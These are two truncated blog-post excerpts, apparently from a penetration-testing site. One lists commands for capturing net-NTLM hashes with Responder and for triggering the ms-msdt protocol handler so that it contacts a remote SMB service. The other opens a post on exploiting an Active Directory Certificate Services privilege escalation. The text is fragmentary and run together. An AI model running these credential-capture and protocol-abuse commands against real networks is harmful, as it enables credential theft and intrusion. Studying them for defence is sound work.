catch net-NTLM hash Start Responder listening1Responder -I eth1 ms-msdt to access remote smb service1msdt.exe ms-msdt:/id PCWDiagnostic /skip forc ...

BackgroundIn this blog post, we will dive into the exploitation of Active Directory Certificate Service Privilege Escalation vulnability that orig ...